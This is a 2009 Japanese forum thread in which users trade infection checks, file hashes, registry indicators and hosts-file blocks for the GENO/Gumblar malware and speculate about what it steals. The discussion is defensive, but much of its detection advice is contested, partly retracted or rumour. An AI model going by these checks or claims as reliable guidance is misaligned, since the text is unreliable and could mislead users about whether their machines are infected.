09/05/17 20:23:37 q9beek69O
>>362
ありがとうございます。いい勉強になりました… orz
迷惑ついでと言っては何ですが、この質問に適切な板を教えてもらえませんか?
板名からすると、PCサロン、windowsあたり?
366:192.168.0.774
09/05/17 20:24:12 zfzbOIpv0
>>363
とりあえず移転も検討してみたら?
URLリンク(wikiwiki.jp)
こことかに。解析も出来るみたい。
367:192.168.0.774
09/05/17 20:25:08 sDfaXn0wO
なぜGENOまとめWikiが劇重いんですか
368:192.168.0.774
09/05/17 20:27:26 sDfaXn0wO
>>363見て了解しました。無意味なレス消費して大変申し訳ないです。
369:192.168.0.774
09/05/17 20:28:09 OKDvuiXi0
>>365
この辺でいいんでない?
【マジレス】超初心者の質問に答えるスレ113【エスパー】
スレリンク(win板)
質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから
370:352
09/05/17 20:35:14 q9beek69O
>>369
スレまで誘導、ありがとうございます!
このご恩はどこかで誰かに返します。
371:192.168.0.774
09/05/17 20:40:21 MP/sWvjo0
2009 05/17 hostsファイルの古いドメイン二つを消去
martuz.cn一行でいいのね。もう旅に出ます。
372:192.168.0.774
09/05/17 21:14:42 W37Yk44D0
ちょっと気になるが、>>185は、どこで感染したんだ?
>>185の操作のみで感染したとなると、ちょっと不気味だ。
それとも、感染以外の単なるトラブルなのかな。
373:192.168.0.774
09/05/17 21:17:02 O8ZrwtGB0
有志が作って下さった
感染チェックツール
URLリンク(3rd.geocities.jp)
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
374:192.168.0.774
09/05/17 21:19:06 7TaPV4fL0
>>373
感染していた場合、cmd.exeを起動するのは危険とのことです。
375:192.168.0.774
09/05/17 21:23:32 O8ZrwtGB0
>>374
それただのネタだったみたい。
376:192.168.0.774
09/05/17 21:25:07 61lOiijw0
まさに情報の錯綜って感じだなオイ
377:192.168.0.774
09/05/17 21:25:21 7TaPV4fL0
そうだったんだ。
というわけなので、まとめサイトの人修正お願いします。
378:192.168.0.774
09/05/17 21:25:29 4g69K7//0
あぬビスレポート見ればわかるけど
感染してて、不発だった場合
手動でcmdを実行すると火がつく可能性がある
379:192.168.0.774
09/05/17 21:25:35 mNi/cx+s0
>>373
怖くて踏めない…
380:192.168.0.774
09/05/17 21:33:04 O8ZrwtGB0
>>379
安全だってば。
スクリーンショット
URLリンク(www.rupan.net)
381:192.168.0.774
09/05/17 21:35:16 U6FqnzDc0
>>363
ここに力を貸してもらえないか聞いてみたら?
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
スレリンク(operate板)
382:192.168.0.774
09/05/17 21:36:30 M2s+iWsi0
>>379
これで何か起きた、って報告は聞かないから大丈夫w
383:192.168.0.774
09/05/17 21:37:11 WLY0wH0PO
>>373踏んだら感染した。
384:192.168.0.774
09/05/17 21:38:33 61lOiijw0
>>383
おせーよ携帯
385:192.168.0.774
09/05/17 21:38:50 O8ZrwtGB0
>>383
嘘はいけません。
386:192.168.0.774
09/05/17 21:41:40 N2pz4sCI0
なんともなかった
387:192.168.0.774
09/05/17 21:55:41 mNi/cx+s0
ほんとに? うう…
388:192.168.0.774
09/05/17 22:01:24 FwEBmaaZ0
正直ネット不慣れな俺には判別できんけど、ツール使わなくても確認はできるんだし安易に踏むべきじゃないのはわかる
389:192.168.0.774
09/05/17 22:17:19 xG23ce6c0
>>375
ネタだったのかよ
本当に錯綜って感じだな・・・結局大人しく暫くネットから離れてるのが正解か・・・
390:192.168.0.774
09/05/17 22:18:38 ++vAYPLj0
>>389
cmdの起動に問題があったこともあった
いまはしらん
391:192.168.0.774
09/05/17 22:19:30 BvZF1aRY0
亜種・新種が多すぎだからネタとも言い切れないのが困り物
392:192.168.0.774
09/05/17 22:23:00 FEBrgm5Z0
どっちにしろcmd実行で火噴いても、検出しても
クリーニンスコするだけだからいんじゃね
393:192.168.0.774
09/05/17 22:25:53 D2jCgTYH0
気が向くたびにcmd起動させては安全を確認している俺がいる。
ニフティの公式HPが感染のデマには心底焦ったからなぁ。
394:192.168.0.774
09/05/17 22:28:02 FEBrgm5Z0
ニフティのレンタル鯖だっけ?
395:192.168.0.774
09/05/17 22:29:58 hMuH46V60
正直怖くて、閲覧できません><
一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
396:192.168.0.774
09/05/17 22:30:44 TTgW4pHv0
>>388
ツールつかったけど、しっかり使えたよ
山田チェッカー出たときも、こんな感じで疑心暗鬼だったのかもね
397:192.168.0.774
09/05/17 22:34:01 5b9h61kx0
sqlsodbc.chmのサイズが1,323
コマンドプロンプトとレジストリは開くんだけど・・・
このウィルスって感染してたら例えばどんな被害があるの?
まじ泣きそうなんだが
398:192.168.0.774
09/05/17 22:37:40 T9pTie3x0
>>337
okですよね、とかじゃなくて最新版に出来るならしておくもんですよ・・・
その面倒くさい精神が感染を招いてるのに不安で尚やらんってのは
他のが出てきたときにもくらかもよ
399:192.168.0.774
09/05/17 22:38:11 q8u6cZFi0
>>397
アウト
・ftpを介しての自サイトの改竄
・クレカ番号やID・Passの流出
・CPUの負荷の増大
ここら辺か?
クリーンインスコしてこい
400:192.168.0.774
09/05/17 22:38:11 BvZF1aRY0
自分のHP持ってなければ再起動した時点でPC終了、クリーンインストール以外の駆除手段無しって程度
HP持ってた場合気づかず更新するとそこがまた感染源に
401:192.168.0.774
09/05/17 22:38:51 N9SKEU4J0
検出スレから少し出張してきました。
スレリンク(sec板:963番) の一部自己転載です。
-----
え~、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
MD5 : 3862b349b9b5c9283925e181ff9f5bf8
URLリンク(www.virustotal.com) (2/40)
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
MD5 : 34cd61d83853e511f0a28027f639a1c9
URLリンク(www.virustotal.com) (0/40)
muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
タチ悪すぎ...
402:192.168.0.774
09/05/17 22:41:35 sXGsF7Ez0
マジでか…
sqlsodbc.chmのサイズが変わらないって話もなかったっけ?
気のせい?デマ?
判断材料がないとかやばすぎる
403:192.168.0.774
09/05/17 22:42:06 7TaPV4fL0
しかし今までこの形式のウイルスが出てこなかった(のかな?)
のが不思議なのかもしれないね。
404:192.168.0.774
09/05/17 22:44:36 5b9h61kx0
>>399
>>400
ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
405:401
09/05/17 22:47:19 N9SKEU4J0
>>397
>401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。
可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...
私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。
# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
多分、何やっても検知できない。
406:192.168.0.774
09/05/17 22:48:32 Zy7kEHYt0
初歩的な質問で申し訳ないのですが……
ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を
書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に
並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって
書き込んだ方がいいのでしょうか?
407:192.168.0.774
09/05/17 22:48:54 FwEBmaaZ0
>>404
windows updateに繋がらないって時点でアウトだろ・・・
408:192.168.0.774
09/05/17 22:49:01 IyeP3TLN0
u.bat 今はe.batか。こいつは去年の秋ぐらいからあるみたい
readerの脆弱性指摘も去年の秋だったかな
genoウイルス感染報告は海外で今年3/18ぐらいだったかな
ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
409:192.168.0.774
09/05/17 22:49:10 ++vAYPLj0
>>402
あったきがする
>>404
オンラインでIDパスワードを使うサービスを使用しているなら
クリーンインストール後に変更推奨
他に安全なPCがあるならそちらからすぐにでも変更推奨
410:192.168.0.774
09/05/17 22:51:04 IyeP3TLN0
190 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/17(日) 01:51:35
>>178
>sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。
ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ
って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
411:192.168.0.774
09/05/17 22:51:08 sXGsF7Ez0
>>409
じゃあ感染しててもまったくわからないこともあるってことか…
鬱陶しいってレベルじゃねーぞこれ
412:192.168.0.774
09/05/17 22:52:46 IyeP3TLN0
感染してからsqlsodbc.chmをメモ帳を開けば面白いものが見れるのか?
413:192.168.0.774
09/05/17 22:52:58 FSY0bnP50
うっとおしさっていう点では、ここ数年稀に見るウイルスだな
414:274
09/05/17 22:53:26 7UVnacRX0
うっひょう、カスペなんかもダメなのか。
さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。
>1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
415:192.168.0.774
09/05/17 22:53:45 mpI/NNW20
有志が作って下さった
感染チェックツール
URLリンク(3rd.geocities.jp)
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
チェック後の起動画面。
URLリンク(www.rupan.net)
416:192.168.0.774
09/05/17 22:53:59 rsd1W3Tn0
>>401
明らかに目立った不具合とかはありますか?
417:192.168.0.774
09/05/17 22:55:53 ++vAYPLj0
>>411
サイズがかわるかどうか怪しいからMD5とか確認しようって流れだった
いまはしらん
418:192.168.0.774
09/05/17 22:56:16 sDfaXn0wO
>>401
横レスですみませんが、
つまり、URLリンク(wepawet.cs.ucsb.edu)
などでソースを見たとき、martuz.cnやgumblar.cnが無くても感染の疑いがあるという事ですか?
419:192.168.0.774
09/05/17 22:59:44 1tk6kEt+0
>>418
なんでそうなるん?
420:192.168.0.774
09/05/17 23:04:10 vIxScWxq0
chmがキーロガーのログ部分なのか?
ちょっくらVMで感染してくるか。
421:192.168.0.774
09/05/17 23:05:11 QXwoDhGF0
ぷりんてぃんがGENOに汚染
422:192.168.0.774
09/05/17 23:05:49 sXGsF7Ez0
感染者がサイト持ってた場合、サイトが書き換わるのは確実
それ以外の症状は出るか不明
感染がわからないこともあるかも
CPU使用率とか目安にならない?
423:192.168.0.774
09/05/17 23:05:50 1tk6kEt+0
>>420
キーロガーじゃなくてsniffingしてる。
424:401
09/05/17 23:06:07 N9SKEU4J0
>>410
キーロガーのログなのかなぁ...私が確保したファイルは、中身思いっきり無意味な文字列だった。
何か暗号化されてるのか、それとも仮想PCで何も入っていないから無意味な文字列になったのか。
あと、マイクロソフトのOncareオンラインスキャン終わった。
...微妙。これ、レポートが出力されないから詳細がわからなすぎる。とりあえず、
1.展開された後のウイルス本体ファイルは削除された。(>401で、muvl.nugの方)
URLリンク(www.virustotal.com)で
MicrosoftがTrojan:Win32/Daonol.Dとして本体検出したので、行けるか?とおもったけど、
一応潜伏後の本体を捕まえそう。(絶対ではないと思うけど。)
2.レジストリの方に登録されたauxのマルウェア実行登録は、そのまま残っている。
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ URLリンク(onecare.live.com)
425:192.168.0.774
09/05/17 23:08:41 vIxScWxq0
>>423
盗聴?それだと俺なんかじゃ中身みるのは難しそうだな
426:192.168.0.774
09/05/17 23:11:13 0KCBdJWL0
sniffingしてるとして、どこに送ってるんだろ?
やっぱりmartuz.cn?
427:192.168.0.774
09/05/17 23:13:17 1a+FrLCg0
>>423
それだとここ最近多発してるオンラインゲームのアカウントハックはコイツが犯人の可能性が濃厚だな。
428:192.168.0.774
09/05/17 23:16:12 ++vAYPLj0
>>427
Genoさんとは別物です
429:192.168.0.774
09/05/17 23:18:28 vIxScWxq0
>>427
あれは中華やチョンのマルウェア仕込んだサイトじゃなかったか
430:192.168.0.774
09/05/17 23:19:29 SfYViNhDO
あーやばいなー
今PCおとして携帯でレスしてるんだけど今日エクスプローラ二回おちてフリーズも二回したからなー
感染してるかもしんねー
431:192.168.0.774
09/05/17 23:25:36 1a+FrLCg0
>>429
それにしちゃ薄く広いのが気になる。
FF11、RO、リネ2くらいのメジャーなのはともかく、マビノギやグラナド、MoEとかのマイナーゲーでも被害が出てる。
(ルナティア、完美世界は運営の失態なので除外)
432:192.168.0.774
09/05/17 23:26:13 vIxScWxq0
>>420
報告、俺も>>424だった。意味不。
433:401
09/05/17 23:26:41 N9SKEU4J0
>>416
嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
434:192.168.0.774
09/05/17 23:28:07 D2jCgTYH0
sqlsodbc.chmって、ヘルプファイルですよね?
なんでそんなとこの容量増やすんですか、このウィルス。
ヘルプの項目に嘘八百を追加するんですか?
435:401
09/05/17 23:28:50 N9SKEU4J0
>>433
>確認は、sqlsodbc.exeだけが頼りですね。
exeじゃねえ... sqlsodbc.chm ですな。
436:401
09/05/17 23:30:13 N9SKEU4J0
>>434
容量を増やしているのではなく、何かに使っているらしい。
書き換えられた後のファイルは、ヘルプファイルとしては壊れた状態で使い物にならない。
437:192.168.0.774
09/05/17 23:31:12 FSY0bnP50
>>424
あくまで推測だけど、サイト書き換えようのFTPのアカウントとキーとアドレス情報の格納場所じゃないかと思う。
chmファイルのサイズが一定しないっていう情報を4月騒動の頃にまとめサイトで見たことがあるんだが、
それは、他の感染PCとキー情報のやり取りをして、情報が増えて行ってるからではないかと思う。
で、他の感染PCと一切交換を行っていない初期サイズが1323バイトとか。
もし、感染した人の中に、chmファイルのサイズが時とともに増加していったっていう情報があれば、その線を疑えると思う。
438:192.168.0.774
09/05/17 23:31:27 ++vAYPLj0
>>431
RMTができれば日本での認知度なんて気にしてないのかもね
客がいれば利益は出るわけだしどのゲームでもやることは同じだし投資は少ないし
特定のターゲットにしぼるより広くやったほうがどれかが潰れても
被害を抑えられるかな
439:192.168.0.774
09/05/17 23:33:53 0KCBdJWL0
>>433
そこまで潜伏できるのにわざわざ明確な印残す意味が分からんなぁ>sqlsodbc.chm
あ、もしかしてsqlsodbc.chmを読み取り属性にしておくと拙いかな、これ?
440:192.168.0.774
09/05/17 23:34:06 OKDvuiXi0
一応書いておく、感染はしてないはず・・・・
sqlsodbc.chm(サイズ:50,727byte)
MD5 : f639afde02547603a3d3930ee4bf8c12
441:192.168.0.774
09/05/17 23:35:15 FSY0bnP50
>>437の補足として、ウイルスを駆除したにも関わらず、FTPパスを変えてなかったら、
自サイトをウイルス誘導ページに書き換えられたっていう報告があるらしい。
そのため、感染PC同士でFTPアカウント情報のやり取りをしており、
どこかに保存しているっていう観点からそう推理してみた。
442:192.168.0.774
09/05/17 23:36:01 MP/sWvjo0
ただいま。
>>434>ヘルプの項目に嘘八百を追加するんですか?
かなりの危険をおかしてまで、たったそれだけの無意味なウイルスは作らないと思うがw
sqlsodbc.chm自体が書き換わったら容量変わるだろ?
じゃあ、おやすみなさい。
443:192.168.0.774
09/05/17 23:36:19 vIxScWxq0
初期スレからいるが、f639という文字列を見る度に感じるホッという安心感はなんなんだろう
俺だけか
444:192.168.0.774
09/05/17 23:36:31 0H7sjBwe0
とりあえずsqlsodbc.chmの更新日時は一年前になってるからOKですよね?
445:192.168.0.774
09/05/17 23:37:21 q8u6cZFi0
>>444
サイズも要確認
446:401
09/05/17 23:37:40 N9SKEU4J0
>>418
ソース見ただけでは感染しないよ。(苦笑
逆に、自分がサイトの管理者であった場合なら、自分が管理しているサイトに異常が無くても
感染している可能性はある。 これは、今の所
・sqlsodbc.chm のサイズを確認。→1,323バイトとか、ファイルが異常に小さくなっていたら確実にアウト
・ダブルクリックして、ヘルプファイルとして開けるか? → ダブルクリックして『壊れている』と表示されたらヤバイ。
→ sqlsodbc.chmをワードパッドなどで開いてみる。ファイルが開けて、中身がテキストデータに置き換わっていたらアウト。
ぐらいしか確認の方法が無い。 cmd.exeとレジストリエディタによる確認方法は、忘れた方が良い。
さて、危ないから感染した仮想PCはゴミ箱行きにします。
447:192.168.0.774
09/05/17 23:37:48 qCuFPmlW0
感染してるか気になって自分も調べたんですけど
XP SP3 でsqlsodbc.chm が無かった
nliteで削ったりしたからだと思うけど。
448:192.168.0.774
09/05/17 23:39:32 OKDvuiXi0
>>447
2000で無い場合に作られるから多分XPでも挙動は同じじゃね?
449:192.168.0.774
09/05/17 23:40:56 qCuFPmlW0
>>448
ですよね。
とりあえず一安心。
アップデートにも繋がりますし。
450:192.168.0.774
09/05/17 23:44:02 ++vAYPLj0
chmは操作かく乱用のダミーっぽいとのこと
ソースは検出可否報告スレ
451:192.168.0.774
09/05/17 23:44:06 j/5AZ8AK0
>>440
現在感染なし
MD5値同じでした
452:192.168.0.774
09/05/17 23:44:47 rsd1W3Tn0
>>433
ありがとう。やっぱりもう重いだとかcmdが開かないとかそんな確認方法は無駄かも「しれない」のね。
sqlsodbc.chmの他にHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の様子はどうですか?
453:192.168.0.774
09/05/17 23:45:12 NJZAyhdU0
つか無料鯖で捨て垢作ってftpで適当なhtmlファイル上げてみてソース確認すれば感染確認できるやないかえ
454:192.168.0.774
09/05/17 23:56:05 kVP/8H1t0
ジェノチェッカーで、俺のPC(VISTA)のsqlsodbc.chmのサイズが46,133で感染の疑いが有るっていうんで、
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
を実行したら最終更新日が2006年11月……
これは、どれを信じりゃいいのかわからなくなってきたんだが。
455:192.168.0.774
09/05/17 23:59:16 jG2pcMw10
とりあえずAdobeのFlashとReaderを最新にするなりアンインストールしとけば平気ですか?
456:401
09/05/17 23:59:33 N9SKEU4J0
>>450
いや、それ私。(苦笑
ダミーと書いた方が先で、ロガーのデータという話の方が後。
この辺は、流石に自分で通信をあっちに傍受させる気はないんで、こちらでは確認はちょっと難しい。
457:192.168.0.774
09/05/18 00:02:47 kVP/8H1t0
>>446
vistaでジェノチェッカーを使用し、ファイルサイズが違うので感染の疑いが濃厚です。
と、出たのだが401さんの言うようにヘルプファイルで開けるし、最終更新日は遙か前だわ。
こうなるとジェノチェッカーで感染したと思いこんじゃう人が出てくるんじゃないだろうか…
458:192.168.0.774
09/05/18 00:02:52 xqkDEgVB0
このGENOって何の為のウィルスかは未だ良く分かってないんですよね?
オマケに感染したのかを2chとかで知って確認した人ぐらいしか自覚が無いらしいし…
新型インフルでは無いけどこれから爆発的に被害出そうで気味悪いなぁ
459:401
09/05/18 00:03:53 N9SKEU4J0
>>452
そこは今まで通り、auxとして登録されるのを確認してあります。>424の2番の所ですね。
詳しい人なら、そこを押さえるのが一番でしょう。 レジストリを確認しにくければ、やはりsqlsodbc.chmのサイズと中身かな。
cmd.exeとレジストリエディタは、あちらが改良したからには、今後のバージョンも使えないと思った方が良いかと。
460:192.168.0.774
09/05/18 00:04:48 vIxScWxq0
あーなんか勝手にドライバ作ってんのね
461:192.168.0.774
09/05/18 00:06:03 FSY0bnP50
なんか、ウイルス作者がこのスレ見て次verの対策練ってたらやだなぁ
462:192.168.0.774
09/05/18 00:08:40 j6rZXl7R0
>>459
今のところauxに痕跡は残しますか
折角regeditを起動させるようにしたみたいだし、レジストリを監視するのも面倒臭くなりそうだなあ
463:192.168.0.774
09/05/18 00:08:43 uebw+uxF0
とりあえず、初心者にわかりやすい説明としてはsqlsodbc.chmをダブクリで開いてみて、
エラーが出ないでヘルプファイルが開けたらセーフとかにしたほうが混乱が少なくていいんじゃマイカ?
464:192.168.0.774
09/05/18 00:09:39 RYc+mlfs0
sqlsodbc.chmのショートカットデスクトップに置いとくか
465:192.168.0.774
09/05/18 00:12:57 H93VbD2h0
>>463
なるほど
分かり易いですサンクス
466:192.168.0.774
09/05/18 00:16:49 r6TpwBf70
>>461
こわいこというなよ
467:192.168.0.774
09/05/18 00:23:11 kK4DaAw60
>>352
自分もはまりました。
RPC と 「有効なデバイスが関連づけられていない」で検索
URLリンク(ziddy.japan.zdnet.com)
こちらに書かれていた情報で直りました。
468:192.168.0.774
09/05/18 00:26:33 SGBG03gk0
>>456
ごめん><
469:192.168.0.774
09/05/18 00:29:04 uebw+uxF0
これって世界規模ではどんな感じで広がってるんだろうか。
あと質問なんだけれど、sqlsodbc.chmって開くと日本語でヘルプファイルが出てくる?
だったら、ジェノチェッカーでサイズの違いで感染に引っかかったというコメントが出る原因がわかるんだが。
もしそうなら俺がドイツ語版vistaを使っているからということで説明がつく。
470:192.168.0.774
09/05/18 00:31:26 yv43KHe00
>>469
日本語だね
>>111のITMedia見る限りでは全世界規模で広がってると考えてよさそう
471:192.168.0.774
09/05/18 00:31:28 +m52NSIq0
今Microsoft Updateをしようとしたら、エラー番号: 0x80072EFDが出て
できませんでした。OSはXP SP3です。
472:192.168.0.774
09/05/18 00:32:17 TQZo9UtD0
>>469
ドイツで多少出ているようです
後でレス探してみます
sqlsodbc.chmはヘルプが出ます
逆に出ないときは感染濃厚ということです
473:192.168.0.774
09/05/18 00:35:35 /YAiDTNe0
いつも思うんだけどさ。
こういう2ちゃんみたいな低俗な掲示板で、頑張ってウイルスと
戦うお前らって、
勇者だよね。
・・・ただのヒマ人?またまた御冗談を。
474:192.168.0.774
09/05/18 00:35:42 uebw+uxF0
>>470
ありがとう。おかげで謎が解けた。
しかし>>457.454でジェノチェッカーの精度に疑いがあると書いてしまった……
他の人が間違えないといいが。
475:192.168.0.774
09/05/18 00:36:49 Jag7vYy/0
今すっごいネット重いんだけどウイルスと関係ある?
476:192.168.0.774
09/05/18 00:37:32 0Y431MZ/0
>>472
俺が知ってるのは
>3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
>感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
URLリンク(www3.atword.jp)
今現在どう進行してるのかね
477:192.168.0.774
09/05/18 00:42:50 uebw+uxF0
>>475
つテレホタイム
>>472
あぁ、ドイツの掲示板でも感染の装弾している所を発見。
やっぱり感染の確認方法はほとんど一緒。
やはり感染疑いのユーザーが雪崩れ込んでて、FUCK!の嵐でまともに相談できていない模様。
どこも一緒なんだなw
478:192.168.0.774
09/05/18 00:47:02 QCHe1qHC0
>>477
すまん、もしよければそのドイツの掲示板を
教えてはくれまいか。
479:192.168.0.774
09/05/18 00:47:30 EMdE+yZc0
>>461
ヒント:相手は外人
ここよりももっと有益な情報が書いてあって、しかもちゃんと纏められてる英語の掲示板見るのでここは見ません
480:192.168.0.774
09/05/18 00:49:25 vNF2317C0
さっきカスペルのチェックでマルウェア検出された俺涙目
今ウィルスバスターでもっかい確認中、ダメならもうだめだ
481:192.168.0.774
09/05/18 00:51:52 uebw+uxF0
>>478
大学とOB用の草の根BBSみたいな所だから、卒業した学生番号がいるんだが。
すまない、それ教えると俺の身元が割れちまうから勘弁してくれ。
482:192.168.0.774
09/05/18 00:52:58 QCHe1qHC0
>>481
承知した。ありがとう。
483:192.168.0.774
09/05/18 00:57:45 D1poB8XB0
作者ってマジで外人なのか
何のために・・・
484:192.168.0.774
09/05/18 00:58:15 +m52NSIq0
アップデートできなかったらってのは、エラー番号: 0x80072EFDがでたらと言うことですか?
それとも、Microsoft Updateのトップサイトにすらつながらない状態ですか?
485:192.168.0.774
09/05/18 00:58:23 0Y431MZ/0
巨大なbotnetの作成
486:192.168.0.774
09/05/18 00:58:25 j6rZXl7R0
金稼ぎじゃないかと言われてる
487:192.168.0.774
09/05/18 01:00:58 vNL6vAf4O
さっきからインターネットが繋がんないんだが…
感染したのかな?
488:192.168.0.774
09/05/18 01:10:07 2IEunuB80
>>483
外人の組織?で、普通に金儲けだと思うよ。
後は愉快犯とかが亜種作ってるんじゃないのかな。
国内のサイトの現状知ったらどう思うのかなー。
489:192.168.0.774
09/05/18 01:15:12 TTbAOLbH0
何よりこわいと思ったのが、製薬会社やらの普通の企業もやられてるのに、未だほとんどニュースとして公表されてないこと
2ch張り付いてる奴ならともかく、もう少し広まったら確実に普通にネットやってる連中のPC終わるぞ
490:192.168.0.774
09/05/18 01:16:58 EgqX730p0
>>489
イメージダウンになるから黙ってるんでしょ
491:192.168.0.774
09/05/18 01:18:53 p9Xcqg7P0
黙ってる方が後で大幅イメージダウンになるこのご時世
492:192.168.0.774
09/05/18 01:23:34 RCHjlpg60
>>489
ネットニュースで最近知ったが日本での発端が四月と聞いてビビッタよ
感染はしてなかったけど感染が判らないだけかも知れないのが気持ち悪い
493:192.168.0.774
09/05/18 01:29:06 j6rZXl7R0
アンチウイルスベンダーの対応も今一だからね…
積極的にプレスリリース出してる所も英語圏が中心でしょう
それが原因じゃないかなあ
494:192.168.0.774
09/05/18 01:33:23 TTbAOLbH0
個人的に一番嫌なのはカスペから乗り換えようとしてたノートン先生の今回の対応が残念すぎたこと
これでまたセキュリティを考え直さなきゃいけない
495:192.168.0.774
09/05/18 01:40:51 Y6ubUO900
感染の確認方法だけど、gnomeの人は初めから
sqlsodbc.chmとレジストリ値の確認だけで
cmd.exeやregeditの起動による確認方法は書いてないね
やっぱりこの人のところが一番信用できるなと思った
ニフティの件みたいに良く読まない人がデマ流したりして大変みたいだけど
これからもがんばってほしい
496:192.168.0.774
09/05/18 01:44:09 BzNhsWFE0
225のヤツとか逮捕の対象にならんの?
ウイルス広めるヤツは逮捕&死刑でいいでしょ。
497:192.168.0.774
09/05/18 01:46:45 AxgR+t010
>>496
225踏んで感染したんですか?
498:192.168.0.774
09/05/18 01:51:13 BzNhsWFE0
いんや。流石にリンクを踏むのが怖くてね。
後に感染したってあったから、もう少し注意が足りなかったら感染してたかも・・・
って考えるとな・・・。
499:192.168.0.774
09/05/18 02:18:04 zXvWG0pfO
>>489
そうだよ!何か今回おかしいよな!
まさかとは思うけど
同人誌とかアニメとかそういうのが大嫌いなやつが
このウイルスを再び蔓延させて
一気にヲタを潰そうと考えたのかもしれない
500:192.168.0.774
09/05/18 02:19:28 SGBG03gk0
>>499
そんなちっぽけなレベルの話じゃないです
501:192.168.0.774
09/05/18 02:19:44 zXvWG0pfO
>>492
何度も悪いけど
その時もあまりおおっぴらに取り上げられなかった筈
今回は何かおかしい
502:192.168.0.774
09/05/18 02:28:00 tHeAy9ld0
どうせ後で「GENOウイルス?あぁあんなんに騙されて大騒ぎしてた奴らなんてただの馬鹿だよww」ってことになんだろ?
503:192.168.0.774
09/05/18 02:28:52 z2bzI9GC0
/^7_
. ,' / /
| //ヘ
| / /
三 | / , ヘ
-‐¬ { ミ / /
\ / 三 L 」 ミ / _ ニコ // ヽ,
. X / | | ミ / >'´ ,.└''"´ ̄ ̄ `ヽ、 キャッシュ消せばいいんだよ
. / / 、 | | / ヽ ,. '´ 、、 ヽ ヽ
. ,′ , \ | |__ ノ , lヽ j /、lヽ ト、_,,.',
{ /´ ̄`'J r'´ r'"イ .ノ\| .レ r=;ァ'レ' { }
― -- { }. { !、 l rr=- / `'''l.>‐ .、
‐ ― ヽ. _人. レヽ.,ト' ー=‐' / l 、,,_,,ノ
/ /ヽl } \. ,}' ', /ヘ, /レ' ,/ >‐、
ヽ / /ミ ノ ノ、 ` 7'´レ1 ヽ 人ル'レ' 'i、_
/ / ミ (_/ \ レ~i` ヽ 、_ ( "
504:192.168.0.774
09/05/18 02:29:04 4oFiJRbxO
ieから火狐に変えれば予防出来る?
てか、初心者向けのまとめサイトってないかな?
505:192.168.0.774
